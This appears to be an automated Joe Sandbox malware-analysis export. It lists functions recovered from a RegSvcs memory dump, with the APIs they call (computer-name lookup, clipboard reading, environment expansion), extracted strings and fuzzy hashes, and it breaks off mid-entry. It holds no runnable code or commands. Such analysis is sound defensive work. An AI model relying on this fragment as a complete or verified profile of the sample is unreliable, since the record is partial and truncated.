Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
Instruction ID: 0c3231226d6b2b3a527619dcc08e6164a4fafcc19f94aab6dc14dc2c5ea58878
Opcode Fuzzy Hash: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
Instruction Fuzzy Hash: A2E0FE75908316AF9A08CF45C14444EFBE5BFC4714F11CC8DA4D863210D3B0AD46DF82

Function 0040BA29 Relevance: 1.3, Strings: 1, Instructions: 84COMMON

Download Yara Rule

Strings

WT, xrefs: 0040BA88

Memory Dump Source

Source File: 00000003.00000002.2407012606.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd

Similarity

API ID:
String ID: WT
API String ID: 0-3626323073
Opcode ID: c98c440a951f3e80385427973262f6473fe4faebb6d8defc51fc15df456e7494
Instruction ID: 7fe90350ce32cbd7e95176aa356467c42c1670bfe7b117e2a0000bb4fcdc20cd
Opcode Fuzzy Hash: c98c440a951f3e80385427973262f6473fe4faebb6d8defc51fc15df456e7494
Instruction Fuzzy Hash: 27213A766083408FC7288F24C89066BF7E2EFC6318F19891DD69717685DB75A806CF8A

Function 0042D420 Relevance: .1, Instructions: 122COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2407012606.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 8448f84bcdf5387fdb1ade7f916e006b21cd764feeb9d4c242b6861ef5379a18
Instruction ID: 8f228e5e5a1e4a0df9a7232996a6af5781287942daa8e57b9f502877da121123
Opcode Fuzzy Hash: 8448f84bcdf5387fdb1ade7f916e006b21cd764feeb9d4c242b6861ef5379a18
Instruction Fuzzy Hash: 4F312735B406428BE7298F29D850332FBA3EF96324B2C825DD1D1577E6D778EC42C644

Function 0040C9A6 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 114
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CoInitializeEx.OLE32(00000000,00000002), ref: 0040C9AA
CoInitializeEx.COMBASE(00000000,00000002), ref: 0040CADC

Strings

i., xrefs: 0040CAE2

Memory Dump Source

Source File: 00000003.00000002.2407012606.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd

Similarity

API ID: Initialize
String ID: i.
API String ID: 2538663250-1725878519
Opcode ID: e8f144b0d0e578520ae92d650570c968faa3f50811db07706bb9956ac234a523
Instruction ID: ba51fcffb96049ba4a9d2ecb0e51bddf3b28327b6748284e76850d605b8acc93
Opcode Fuzzy Hash: e8f144b0d0e578520ae92d650570c968faa3f50811db07706bb9956ac234a523
Instruction Fuzzy Hash: 0F41C9B4810B40AFD370EF39D94B7127EB8AB05250F504B1DF9E6866D4E631A4198BD7

Function 0042F3C5 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 129
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetComputerNameExA.KERNELBASE(00000006,?,?), ref: 0042F4FE

Strings

ABQH, xrefs: 0042F482

Memory Dump Source

Source File: 00000003.00000002.2407012606.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd

Similarity

API ID: ComputerName
String ID: ABQH
API String ID: 3545744682-2857704541
Opcode ID: 21a26049c95029f14debd43ff901fc75587960d99a2a052f20e81db94443e019
Instruction ID: 5b9f06d29d21be6fc1f49ae5373236c4f88bea70ce57d6927e68f4d7a729ffcc
Opcode Fuzzy Hash: 21a26049c95029f14debd43ff901fc75587960d99a2a052f20e81db94443e019
Instruction Fuzzy Hash: CC3126742046928FD715CF24D890663BBF2EF66314F14816DD4E21BB42C379685ACBA5

Function 00432D44 Relevance: 1.6, APIs: 1, Instructions: 94COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32 ref: 00432D68

Memory Dump Source

Source File: 00000003.00000002.2407012606.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd

Similarity

API ID: InitVariant
String ID:
API String ID: 1927566239-0
Opcode ID: abb8198e76b9dbc638f6b64f0f056e50e4a5a60b888bb2a26f00c9e297661d1a
Instruction ID: f7f883e2ad49da0fecad536576301c807aa78c4ca5f2a4f40745664147204c84
Opcode Fuzzy Hash: abb8198e76b9dbc638f6b64f0f056e50e4a5a60b888bb2a26f00c9e297661d1a
Instruction Fuzzy Hash: 0A414F70108BC08EE365CB38C598757BFE16B56308F48489DD5D68BB92C7BAB509CB62

Function 0042F596 Relevance: 1.6, APIs: 1, Instructions: 75COMMON

Download Yara Rule

APIs

GetComputerNameExA.KERNELBASE(00000005,?,?), ref: 0042F62E

Memory Dump Source

Source File: 00000003.00000002.2407012606.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd

Similarity

API ID: ComputerName
String ID:
API String ID: 3545744682-0
Opcode ID: bef4936573cb1b14369d8eaac4f9090ae5688f478e73a6ad368257c6db6403fa
Instruction ID: 76e407ce98a51277e7cb13f46241631caeedb7dd1d9a2c9078d1ba909d45b5aa
Opcode Fuzzy Hash: bef4936573cb1b14369d8eaac4f9090ae5688f478e73a6ad368257c6db6403fa
Instruction Fuzzy Hash: 122190742046928BEB158F25D4617B3BBE1EF53300F6885AAD4C69B392D7389C86CB64

Function 0042F586 Relevance: 1.6, APIs: 1, Instructions: 61COMMON

Download Yara Rule

APIs

GetComputerNameExA.KERNELBASE(00000005,?,?), ref: 0042F62E

Memory Dump Source

Source File: 00000003.00000002.2407012606.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd

Similarity

API ID: ComputerName
String ID:
API String ID: 3545744682-0
Opcode ID: 2a2e06b06b06b3c81bc5c5135b626a7c0281056ffdb54b32e1af479912c1722b
Instruction ID: d9a4f91a2702334bf36e07a4eed7b442d690e9a594b68c6ebc6cd94c5554eabc
Opcode Fuzzy Hash: 2a2e06b06b06b3c81bc5c5135b626a7c0281056ffdb54b32e1af479912c1722b
Instruction Fuzzy Hash: 7A11A1742046428BEB058F24D8A1BB7BBF2EF56300F5885A9D196DB392D738DC86CB54

Function 00440260 Relevance: 1.5, APIs: 1, Instructions: 45memoryCOMMON

Download Yara Rule

APIs

RtlReAllocateHeap.NTDLL(?,00000000,?,?,?,?,0040B51C,00000000,00000001), ref: 00440292

Memory Dump Source

Source File: 00000003.00000002.2407012606.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 62298e30a4241653b6984ab1444618431f42e0cdb861d2290b65488c60bec4cd
Instruction ID: 9d73e3fc9da24b4a25dc6ea464106973b4d99c6e73c38ef93f1a8f1a834cd47d
Opcode Fuzzy Hash: 62298e30a4241653b6984ab1444618431f42e0cdb861d2290b65488c60bec4cd
Instruction Fuzzy Hash: EFF0203A909200EBE2006F2ABC05A173668BF8A325F020876F000D31A5D738E8218A9B

Function 00432648 Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

CoSetProxyBlanket.COMBASE ref: 00432696

Memory Dump Source

Source File: 00000003.00000002.2407012606.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd

Similarity

API ID: BlanketProxy
String ID:
API String ID: 3890896728-0
Opcode ID: 2e53f1206323ee2cade14c3224eb0fa84b417d36bb7d5e7098e7bca86b682ba1
Instruction ID: 64921bb5e8d0d2665883c7be70a8893bafea9755363c5f099f224ef3642789f1
Opcode Fuzzy Hash: 2e53f1206323ee2cade14c3224eb0fa84b417d36bb7d5e7098e7bca86b682ba1
Instruction Fuzzy Hash: 29F07AB4109701CFE311DF64C5A4B5ABBF0FB85304F11985CE4958B3A1D7B59A49CF92

Function 0043E860 Relevance: 1.5, APIs: 1, Instructions: 22memoryCOMMON

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(?,00000000,?,004402AB,?,0040B51C,00000000,00000001), ref: 0043E87E

Memory Dump Source

Source File: 00000003.00000002.2407012606.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: d4ba0eb0295cb291fecaea3e71dbbc32e179608d3b32058e4b112bc51f780ac0
Instruction ID: edab8ee5216d5c962334db0beb90db3a31f2e897247f77843e17d527c4ab1b3a
Opcode Fuzzy Hash: d4ba0eb0295cb291fecaea3e71dbbc32e179608d3b32058e4b112bc51f780ac0
Instruction Fuzzy Hash: F0D0A734188121DFD7005F14FC05B873758DF0A351F020872B404AB1B5C234EC50C69C

Function 0043E840 Relevance: 1.5, APIs: 1, Instructions: 9memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(?,00000000,?,67660564,00408969,67660564), ref: 0043E850

Memory Dump Source

Source File: 00000003.00000002.2407012606.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 3bcc0ae032fcfa855b4001ec6a7ed76c7c2836dbd2700616eddc664b251f816c
Instruction ID: 1c12cdc91dcc22cd6618a30bc84945b256d08a32317763a8f107efb347479c5b
Opcode Fuzzy Hash: 3bcc0ae032fcfa855b4001ec6a7ed76c7c2836dbd2700616eddc664b251f816c
Instruction Fuzzy Hash: E4C09B31145120ABD5103F15FC05FC67F64DF45391F010465B00467076C760BC91C6DD

Non-executed Functions

Function 00425E00 Relevance: 34.2, Strings: 27, Instructions: 430COMMON

Download Yara Rule

Strings

`g, xrefs: 004261C7
tj, xrefs: 00426810
8>, xrefs: 0042689F
o<KB, xrefs: 004265EA
rp, xrefs: 00426051
{x, xrefs: 004264EB
T`Zf, xrefs: 0042664D
BpFv, xrefs: 00426679
)p*v, xrefs: 004264D5
.H>N, xrefs: 0042660B
&P%V, xrefs: 00426621
(X6^, xrefs: 00426637
x~, xrefs: 004267EF
7w, xrefs: 00425F65
;T&Z, xrefs: 0042662C
!h#n, xrefs: 00426663
K4l:, xrefs: 00426430
_lYr, xrefs: 0042666E
U\, xrefs: 004261BC
G0]6, xrefs: 004265C9
-tz, xrefs: 004264E0
T8e>, xrefs: 004265DF
.D)J, xrefs: 00426600
2{<u, xrefs: 00425F5A
Rd"j, xrefs: 00426658
|,X2, xrefs: 004265BE
4~|, xrefs: 00426314

Memory Dump Source

Source File: 00000003.00000002.2407012606.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd

Similarity

API ID:
String ID: !h#n$&P%V$(X6^$)p*v$-tz$.D)J$.H>N$2{<u$4~|$7w$;T&Z$BpFv$G0]6$K4l:$Rd"j$T8e>$T`Zf$U\$_lYr$`g$o<KB${x$|,X2$8>$rp$tj$x~
API String ID: 0-2870231824
Opcode ID: df71505268c028ffb0bd486a89103a37c107dc5adc46b736a241bad54def65e1
Instruction ID: e4eadb167d9284e983c6371bd9484b3f2b8716763c332f31a73ee98d54a9440e
Opcode Fuzzy Hash: df71505268c028ffb0bd486a89103a37c107dc5adc46b736a241bad54def65e1
Instruction Fuzzy Hash: E53209B160C7D48AD334CF14C442BDFBAF2EB92304F00892DC5E96B215D7B6564A8B9B

Function 004251E8 Relevance: 34.2, Strings: 27, Instructions: 426COMMON

Download Yara Rule

Strings

;T&Z, xrefs: 00425A0C
{x, xrefs: 004258CB
BpFv, xrefs: 00425A59
8>, xrefs: 00425C7F
7w, xrefs: 00425345
_lYr, xrefs: 00425A4E
K4l:, xrefs: 00425810
G0]6, xrefs: 004259A9
x~, xrefs: 00425BCF
4~|, xrefs: 004256F4
.H>N, xrefs: 004259EB
`g, xrefs: 004255A7
Rd"j, xrefs: 00425A38
o<KB, xrefs: 004259CA
&P%V, xrefs: 00425A01
T8e>, xrefs: 004259BF
.D)J, xrefs: 004259E0
(X6^, xrefs: 00425A17
rp, xrefs: 00425431
2{<u, xrefs: 0042533A
!h#n, xrefs: 00425A43
U\, xrefs: 0042559C
)p*v, xrefs: 004258B5
tj, xrefs: 00425BF0
-tz, xrefs: 004258C0
|,X2, xrefs: 0042599E
T`Zf, xrefs: 00425A2D

Memory Dump Source

Source File: 00000003.00000002.2407012606.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd

Similarity

API ID:
String ID: !h#n$&P%V$(X6^$)p*v$-tz$.D)J$.H>N$2{<u$4~|$7w$;T&Z$BpFv$G0]6$K4l:$Rd"j$T8e>$T`Zf$U\$_lYr$`g$o<KB${x$|,X2$8>$rp$tj$x~
API String ID: 0-2870231824
Opcode ID: bb8f5c017a04f448ec77eaa504b06c268e6e3bd4e83d5db79ec8c788eea25bd9
Instruction ID: 85683be32e8b5f4f428226e946852424525cd865b1790a78dd48afa17569a373
Opcode Fuzzy Hash: bb8f5c017a04f448ec77eaa504b06c268e6e3bd4e83d5db79ec8c788eea25bd9
Instruction Fuzzy Hash: 423208B160C7D48AD334CF14C442BDFBAF2EB92304F40892DC5E96B215D7B6564A8B9B

Function 00415E42 Relevance: 16.8, APIs: 4, Strings: 5, Instructions: 1043COMMON

Download Yara Rule

Strings

LH, xrefs: 004165FD
[T, xrefs: 004163B4
GpFv, xrefs: 00416633
AtP, xrefs: 0041663A
LH, xrefs: 0041638A

Memory Dump Source

Source File: 00000003.00000002.2407012606.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd

Similarity

API ID:
String ID: AtP$GpFv$LH$LH$[T
API String ID: 0-1191849916
Opcode ID: 9f8a8d8b39a13838edde9a1b50270b6620bdc73dc6028a05be0a7079155c4cee
Instruction ID: 4372fb21f11b9819d30698d9d45361d0369da0689afe6659426da76e72155524
Opcode Fuzzy Hash: 9f8a8d8b39a13838edde9a1b50270b6620bdc73dc6028a05be0a7079155c4cee
Instruction Fuzzy Hash: C872F275600B01CFD724CF29C8917A3B7B2FF8A314B19896DD8968B7A1D739E842CB54

Function 004161DF Relevance: 16.5, APIs: 4, Strings: 5, Instructions: 726COMMON

Download Yara Rule

APIs

RtlExpandEnvironmentStrings.NTDLL(00000000,?,?,00000000,00000000,?,?,?,?,?,00000000,?), ref: 004164C7

Strings

LH, xrefs: 004165FD
[T, xrefs: 004163B4
GpFv, xrefs: 00416633
AtP, xrefs: 0041663A
LH, xrefs: 0041638A

Memory Dump Source

Source File: 00000003.00000002.2407012606.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd

Similarity

API ID: EnvironmentExpandStrings
String ID: AtP$GpFv$LH$LH$[T
API String ID: 237503144-1191849916
Opcode ID: 1b588242ea16f88214a7b3f74664b69940c21a90d5ac88c4a02d85973340d39e
Instruction ID: 33ac3c3fba2e5f2169ec6e70d98a4de6486b49fd6ba05196e176a44067b630e5
Opcode Fuzzy Hash: 1b588242ea16f88214a7b3f74664b69940c21a90d5ac88c4a02d85973340d39e
Instruction Fuzzy Hash: D83224756007018FC724CF29C8917A3B7F2FF96314B1A85ADD8968B7A1D739E842CB54

Function 004245C0 Relevance: 10.7, APIs: 3, Strings: 3, Instructions: 217COMMON

Download Yara Rule

APIs

RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,00000000), ref: 00424698

Strings

=jh, xrefs: 00424622
D6v4, xrefs: 00424655
}z, xrefs: 00424646

Memory Dump Source

Source File: 00000003.00000002.2407012606.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd

Similarity

API ID: EnvironmentExpandStrings
String ID: =jh$D6v4$}z
API String ID: 237503144-2424248051
Opcode ID: 4c05a009a65ea3e28b23781bbd6519d7c2246800a1a7ede0d36e82eaf8dc30d2
Instruction ID: 072dcfe1279749a49c563166b893412059df4ddb98baf7635cf88deb1ed00509
Opcode Fuzzy Hash: 4c05a009a65ea3e28b23781bbd6519d7c2246800a1a7ede0d36e82eaf8dc30d2
Instruction Fuzzy Hash: E071227560C3509FE7208F24EC4175FBBE4EBC2718F10892DF5A49B291DBB4980A8B96

Function 004363E0 Relevance: 9.1, APIs: 6, Instructions: 130clipboardCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32 ref: 00436402
GetClipboardData.USER32 ref: 00436423
GlobalLock.KERNEL32 ref: 00436440
GlobalUnlock.KERNEL32 ref: 00436565
CloseClipboard.USER32 ref: 0043656D

Memory Dump Source

Source File: 00000003.00000002.2407012606.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd

Similarity

API ID: Clipboard$Global$CloseDataLockOpenUnlock
String ID:
API String ID: 1006321803-0
Opcode ID: 81a847a3543872956842440432a8dfee523cfdb2ded88c6c7e7e11ec6d44b1fe
Instruction ID: b86dd0c9fbfd43ae0b58d105ee5404c8a2eb2c5d505c68a19c0745f829c1e84f
Opcode Fuzzy Hash: 81a847a3543872956842440432a8dfee523cfdb2ded88c6c7e7e11ec6d44b1fe
Instruction Fuzzy Hash: C941D1B1908B529FD700AF7C988925ABFA0AB06320F05873EE8E5973C6D3389555C797

Function 004165EE Relevance: 9.1, APIs: 2, Strings: 3, Instructions: 363COMMON

Download Yara Rule

Strings

LH, xrefs: 004165FD
GpFv, xrefs: 00416633
AtP, xrefs: 0041663A

Memory Dump Source

Source File: 00000003.00000002.2407012606.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd

Similarity

API ID:
String ID: AtP$GpFv$LH
API String ID: 0-40351562
Opcode ID: 576404afa7e41153aeffadb6763136bbdbb0afcb7c2826d3ac7b4f79fb061b07
Instruction ID: 6bb0aad597ceb399f229923281458bf5411d9ceb9ec5dfacab6a3e1016280f03
Opcode Fuzzy Hash: 576404afa7e41153aeffadb6763136bbdbb0afcb7c2826d3ac7b4f79fb061b07
Instruction Fuzzy Hash: 04C1F275200B018FC725CF29C891663B7F2FF96314B1A896ED8968B7A5E778F841CB44

Function 00417451 Relevance: 6.7, Strings: 5, Instructions: 462COMMON

Download Yara Rule

Strings

puGG, xrefs: 00417479
KWYb, xrefs: 00417464
[NC~, xrefs: 00417480
R^lf, xrefs: 00417472
V]E^, xrefs: 0041746B

Memory Dump Source

Source File: 00000003.00000002.2407012606.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd

Similarity

API ID:
String ID: KWYb$R^lf$V]E^$[NC~$puGG
API String ID: 0-3448173581
Opcode ID: 68f8decb0507b526bb0b8b235139426a9b71c66a9f93ba188218d6a7d3b065e7
Instruction ID: 136c07a549b812a85170c773b68f542c8dc67558d112d0f44613d1a83f6642fd
Opcode Fuzzy Hash: 68f8decb0507b526bb0b8b235139426a9b71c66a9f93ba188218d6a7d3b065e7
Instruction Fuzzy Hash: 18E16475608601DFC7248F29CC816A777B2FF8A310F19857ED5568B7A1E739E842CB48

Function 0040A910 Relevance: 6.7, Strings: 5, Instructions: 422COMMON

Download Yara Rule

Strings

<, xrefs: 0040A9F8
C|, xrefs: 0040AA00
~Bzx, xrefs: 0040A922
WR, xrefs: 0040AB42
~|, xrefs: 0040AA08

Memory Dump Source

Source File: 00000003.00000002.2407012606.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd

Similarity

API ID:
String ID: <$C|$WR$~Bzx$~|
API String ID: 0-1711356705
Opcode ID: 759e3f713937f53d1145da5574e760211f3564257749ddce68042d6697c28895
Instruction ID: c242de3d159764505c2276e72245a45d8931141d93d3f41c6525b63a99f65b4f
Opcode Fuzzy Hash: 759e3f713937f53d1145da5574e760211f3564257749ddce68042d6697c28895
Instruction Fuzzy Hash: 3BD1287664C3504BD318CF29885126FBBE3ABC2314F19897EE4D5AB381C779C90A8787

Function 00420B10 Relevance: 5.5, Strings: 4, Instructions: 470COMMON

Download Yara Rule

Strings

745:2$76, xrefs: 00420C04
2$76, xrefs: 00420BD5
_\], xrefs: 00420CD6
p@, xrefs: 00420F26

Memory Dump Source

Source File: 00000003.00000002.2407012606.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd

Similarity

API ID:
String ID: 2$76$745:2$76$_\]$p@
API String ID: 0-2055486527
Opcode ID: 692f9ee771d2d81641aa3ae234354e2c9c2a2707556fcb6c8f5c436a55a784cf
Instruction ID: d14b64437fda7db03077973c55caa55540a0466a372fa5b5a151a26c722ec16b
Opcode Fuzzy Hash: 692f9ee771d2d81641aa3ae234354e2c9c2a2707556fcb6c8f5c436a55a784cf
Instruction Fuzzy Hash: 5CD1CF716183508FD724CF64D891BABBBF0EF95318F04882DE98587392E7B9E845CB46

Function 0042DD30 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 167COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(D7DADAD1), ref: 0042DE55

Strings

#v, xrefs: 0042DE55
3Z{, xrefs: 0042DDA0

Memory Dump Source

Source File: 00000003.00000002.2407012606.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd

Similarity

API ID: FreeLibrary
String ID: #v$3Z{
API String ID: 3664257935-3529036974
Opcode ID: 52e2302ab1351103ee4792a9557da4963a6bcc2172eb5e395f038b61ae502095
Instruction ID: 974a3689560b078f5541bff02c23d3e4bc65e838cbd55ddb6ad84d7362020e57
Opcode Fuzzy Hash: 52e2302ab1351103ee4792a9557da4963a6bcc2172eb5e395f038b61ae502095
Instruction Fuzzy Hash: F641F1706047819FE7268F249890B63BFE1AF67304F28449DE4D65F392D72A9806CB65

Function 0042A810 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 163COMMON

Download Yara Rule

APIs

RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001F,00000000,00000000,?), ref: 0042A8EB
RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001F,00000000,?,?), ref: 0042A97D

Strings

~, xrefs: 0042A832

Memory Dump Source

Source File: 00000003.00000002.2407012606.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd

Similarity

API ID: EnvironmentExpandStrings
String ID: ~
API String ID: 237503144-2894255414
Opcode ID: 7afbc3bd430aafb6d99ace3ea95c2faa1dcfd28ffa5abcf8623c816d7c1fadb5
Instruction ID: 0060a675a86d7ee076ee5ed7f34d7278311ae35c8cfae6d949a6dc28de4d3802
Opcode Fuzzy Hash: 7afbc3bd430aafb6d99ace3ea95c2faa1dcfd28ffa5abcf8623c816d7c1fadb5
Instruction Fuzzy Hash: A351FEB56483459FE350DF61AC81A2FBBB9EB86704F00583CF6809B291DBB0D40ACB47

Function 0042F799 Relevance: 5.4, Strings: 4, Instructions: 395COMMON

Download Yara Rule

Strings

$&?3, xrefs: 0042F9CF
99C?, xrefs: 0042FB07
;(?>, xrefs: 0042FB00
0-/?, xrefs: 0042F9D6

Memory Dump Source

Source File: 00000003.00000002.2407012606.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd

Similarity

API ID:
String ID: $&?3$0-/?$99C?$;(?>
API String ID: 0-2409071036
Opcode ID: e133a7b7fa4b30eba9d8dd8762af5ae8fa74075651ce804875519ff4ab040977
Instruction ID: f66a5fe417f6b708e5f26068a280dd0292c096a76de8314330cd7006a92fc357
Opcode Fuzzy Hash: e133a7b7fa4b30eba9d8dd8762af5ae8fa74075651ce804875519ff4ab040977
Instruction Fuzzy Hash: 2AD15EB49007419FD720EF39D586752BFF0EB12300F544AAED8EA4B786D334A45ACB96

Function 00408EB0 Relevance: 5.3, Strings: 4, Instructions: 299COMMON

Download Yara Rule

Strings

`]0o, xrefs: 00408FA0
mooj, xrefs: 00408F90
", xrefs: 00408FC8
MP, xrefs: 00408F12

Memory Dump Source

Source File: 00000003.00000002.2407012606.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd

Similarity

API ID:
String ID: "$MP$`]0o$mooj
API String ID: 0-750224902
Opcode ID: b1852bd034d5f07e6c7418944058fbcc2db243f872094cebdf7b16bddf70df29
Instruction ID: b19b03646b16de912904001b94da70090da2d56033d31c768745f7e78282d27d
Opcode Fuzzy Hash: b1852bd034d5f07e6c7418944058fbcc2db243f872094cebdf7b16bddf70df29
Instruction Fuzzy Hash: EC71183150D3929AD711CF29849077BFFE1AF96344F1889BED4C4AB387C639890AC766

Function 0041AA90 Relevance: 4.4, Strings: 3, Instructions: 606COMMON

Download Yara Rule

Strings

]Z, xrefs: 0041AEFC
>j%h, xrefs: 0041B0E5
YF, xrefs: 0041B0CB

Memory Dump Source

Source File: 00000003.00000002.2407012606.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd

Similarity

API ID:
String ID: >j%h$YF$]Z
API String ID: 0-4187760579
Opcode ID: 315e0b80a172105bdb6125941b7bc3327eb2f506a6e5818f00821b26c43edc6d
Instruction ID: 9eece3b8ce7a95ea6ecb53f0b37b23c6ac9ce84f3b4a74f9026e79692fb54b94
Opcode Fuzzy Hash: 315e0b80a172105bdb6125941b7bc3327eb2f506a6e5818f00821b26c43edc6d
Instruction Fuzzy Hash: CD02037160C3009BD7189F25C8916AFBBF2EFD5314F08892DE4D58B382E7399946C78A

Function 004095A0 Relevance: 4.1, Strings: 3, Instructions: 375COMMON

Download Yara Rule

Strings

JO}, xrefs: 00409780
no, xrefs: 004098B8
C8E343450A3B0C22B960CC18D99B375A, xrefs: 00409665

Memory Dump Source

Source File: 00000003.00000002.2407012606.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd

Similarity

API ID:
String ID: C8E343450A3B0C22B960CC18D99B375A$JO}$no
API String ID: 0-593617958
Opcode ID: 39d72df67d6d4dec9bb311bdf5152167ba102bc258e75940eeb29ed02a9edc23
Instruction ID: a84f769f8163236c19afa71ab8ebfca9a7e40634951dcb5e8a3fb7dd6940477d
Opcode Fuzzy Hash: 39d72df67d6d4dec9bb311bdf5152167ba102bc258e75940eeb29ed02a9edc23
Instruction Fuzzy Hash: 5AC1F3B160C3408BD718DF35D8916AFBBE2EBD2304F144A2DE5D29B392DA38C509CB56

Function 0042E5C2 Relevance: 3.9, Strings: 3, Instructions: 189COMMON

Download Yara Rule

Strings

|lx1, xrefs: 0042E71D
khvr, xrefs: 0042E716
)2^, xrefs: 0042E6C0

Memory Dump Source

Source File: 00000003.00000002.2407012606.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd

Similarity

API ID:
String ID: )2^$khvr$|lx1
API String ID: 0-2191243274
Opcode ID: 4ccf6364555e8cdb5bfd8096454ae9d86d60a5367683d88ebbcbe3196d12286d
Instruction ID: 4de4a3a3beb6c19d42a4d3ade4e4e91008c027f5d3f459ded0861b50ff37b2bd
Opcode Fuzzy Hash: 4ccf6364555e8cdb5bfd8096454ae9d86d60a5367683d88ebbcbe3196d12286d
